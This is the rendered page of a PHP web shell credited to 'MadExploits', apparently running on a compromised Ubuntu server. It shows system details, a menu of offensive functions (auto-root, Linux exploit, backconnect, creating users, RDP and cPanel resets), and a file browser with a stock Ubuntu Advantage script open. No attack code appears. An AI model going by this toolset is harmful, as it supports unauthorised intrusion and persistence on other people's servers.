Linux websever 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 192.168.3.70 | : 192.168.1.99
Cant Read [ /etc/named.conf ]
8.1.2-1ubuntu2.23
urlab
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
lib /
ubuntu-advantage /
[ HOME SHELL ]
Name
Size
Permission
Action
apt-esm-json-hook
42.32
KB
-rwxr-xr-x
apt_news.py
721
B
-rw-r--r--
auto_attach.py
2.98
KB
-rw-r--r--
cloud-id-shim.sh
500
B
-rwxr-xr-x
daemon.py
1.39
KB
-rw-r--r--
esm_cache.py
592
B
-rwxr-xr-x
migrate_user_config.py
5.42
KB
-rw-r--r--
patch_status_json.py
2.36
KB
-rwxr-xr-x
reboot_cmds.py
5.17
KB
-rw-r--r--
timer.py
6.36
KB
-rw-r--r--
upgrade_lts_contract.py
3.68
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : esm_cache.py
#!/usr/bin/env python3 import logging from uaclient.apt import update_esm_caches from uaclient.config import UAConfig from uaclient.daemon import setup_logging LOG = logging.getLogger("pro") def main(cfg: UAConfig) -> None: try: update_esm_caches(cfg) except Exception as e: msg = getattr(e, "msg", str(e)) LOG.error("Error updating the cache: %s", msg) if __name__ == "__main__": cfg = UAConfig() setup_logging( logging.INFO, logging.DEBUG, log_file=cfg.log_file, logger=logging.getLogger(), ) main(cfg)
Close